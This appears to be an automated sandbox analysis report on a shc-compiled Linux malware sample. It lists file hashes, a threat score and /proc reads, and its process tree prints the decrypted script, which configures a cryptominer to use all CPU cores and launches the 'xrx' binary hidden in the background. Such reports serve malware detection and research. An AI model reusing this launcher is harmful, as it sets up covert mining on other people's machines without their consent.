747091fd60a9c41ff26d3878bac923c9c14b5472238874754577e14d47b8cba7

Analysis

max time kernel
0s
max time network
132s
platform
ubuntu-24.04_amd64
resource
ubuntu2404-amd64-20240523-en
resource tags

arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
submitted
26-11-2024 12:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B
Size

1020KB
MD5

42693670c71a529a11e81943f5b36c5b
SHA1

9026cc25786215bba3bc06c4875f7da410425f8c
SHA256

eb2329422e52901d0bea0c0fcc4b3a6d1923ef278a96d2a14ab1839882cd0ecf
SHA512

a92d9bd9cd4c1c81a2e8042a9b7c31badba5e033743f34fb851b60350c5833afb246c64fc982112afecad9b1fc48bfdeab16a7bda169b4a635a8922549067d82
SSDEEP

12288:ztLJzlNZDaY9FnavUIqEhgvmKe36myOP7/67LN5kwrHNq9EnE:zvxNZD7FnavUILhgvJeb/67LFLNq9

Score

6^/10

discovery

Malware Config

Signatures

Enumerates running processes
Discovers information about currently running processes on the system

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

Processes:

pidof

description	ioc	Process
File opened for reading	/proc/388/stat	pidof
File opened for reading	/proc/1052/stat	pidof
File opened for reading	/proc/1078/cmdline	pidof
File opened for reading	/proc/1254/stat	pidof
File opened for reading	/proc/1341/cmdline	pidof
File opened for reading	/proc/37/cmdline	pidof
File opened for reading	/proc/40/stat	pidof
File opened for reading	/proc/198/stat	pidof
File opened for reading	/proc/2279/stat	pidof
File opened for reading	/proc/2836/cmdline	pidof
File opened for reading	/proc/1129/cmdline	pidof
File opened for reading	/proc/1401/stat	pidof
File opened for reading	/proc/2139/stat	pidof
File opened for reading	/proc/2566/stat	pidof
File opened for reading	/proc/39/stat	pidof
File opened for reading	/proc/188/stat	pidof
File opened for reading	/proc/762/cmdline	pidof
File opened for reading	/proc/2034/stat	pidof
File opened for reading	/proc/2261/stat	pidof
File opened for reading	/proc/2306/stat	pidof
File opened for reading	/proc/2325/stat	pidof
File opened for reading	/proc/2352/stat	pidof
File opened for reading	/proc/27/stat	pidof
File opened for reading	/proc/437/stat	pidof
File opened for reading	/proc/586/stat	pidof
File opened for reading	/proc/2327/cmdline	pidof
File opened for reading	/proc/32/cmdline	pidof
File opened for reading	/proc/192/cmdline	pidof
File opened for reading	/proc/1061/stat	pidof
File opened for reading	/proc/2209/stat	pidof
File opened for reading	/proc/2231/stat	pidof
File opened for reading	/proc/2352/cmdline	pidof
File opened for reading	/proc/2553/cmdline	pidof
File opened for reading	/proc/2627/stat	pidof
File opened for reading	/proc/30/cmdline	pidof
File opened for reading	/proc/509/cmdline	pidof
File opened for reading	/proc/1058/cmdline	pidof
File opened for reading	/proc/35/stat	pidof
File opened for reading	/proc/56/stat	pidof
File opened for reading	/proc/2212/cmdline	pidof
File opened for reading	/proc/2329/cmdline	pidof
File opened for reading	/proc/2424/stat	pidof
File opened for reading	/proc/7/stat	pidof
File opened for reading	/proc/26/stat	pidof
File opened for reading	/proc/34/stat	pidof
File opened for reading	/proc/2129/cmdline	pidof
File opened for reading	/proc/2767/cmdline	pidof
File opened for reading	/proc/13/cmdline	pidof
File opened for reading	/proc/33/cmdline	pidof
File opened for reading	/proc/40/cmdline	pidof
File opened for reading	/proc/2037/cmdline	pidof
File opened for reading	/proc/2321/stat	pidof
File opened for reading	/proc/2831/stat	pidof
File opened for reading	/proc/2831/cmdline	pidof
File opened for reading	/proc/50/cmdline	pidof
File opened for reading	/proc/741/stat	pidof
File opened for reading	/proc/1065/stat	pidof
File opened for reading	/proc/2827/stat	pidof
File opened for reading	/proc/2827/cmdline	pidof
File opened for reading	/proc/51/cmdline	pidof
File opened for reading	/proc/2317/cmdline	pidof
File opened for reading	/proc/2642/cmdline	pidof
File opened for reading	/proc/43/stat	pidof
File opened for reading	/proc/824/stat	pidof

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B
/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B
1⤵
PID:2831

/bin/bash
/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c "exec '/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B' \"\$@\"" /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B
1⤵
PID:2831

/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B
/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B
1⤵
PID:2831

/bin/bash
/tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B -c " #!/bin/bash if [[ \$(cat config.json | grep xxcountxx) ]]; then echo \"configuring miner\" sed -i \"s/xxcountxx/\$(nproc)/g\" config.json else echo \"using preconfigured miner\" fi PID=\$(pidof xrx) if [ \$# -eq 0 ]; then ##if no arguments if [ -z \"\${PID}\" ]; then ./xrx </dev/null &>/dev/null & disown -h %1 echo \"miner online\" else echo \"miner already online\" fi fi " /tmp/样本/Linux/shc加密脚本/42693670C71A529A11E81943F5B36C5B
1⤵
PID:2831
- /usr/bin/cat
  cat config.json
  2⤵
  PID:2834
- /usr/bin/grep
  grep xxcountxx
  2⤵
  PID:2835
- /usr/bin/pidof
  pidof xrx
  2⤵
  - Reads runtime system information
  PID:2836
- /tmp/样本/Linux/shc加密脚本/xrx
  ./xrx
  2⤵
  PID:2837

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads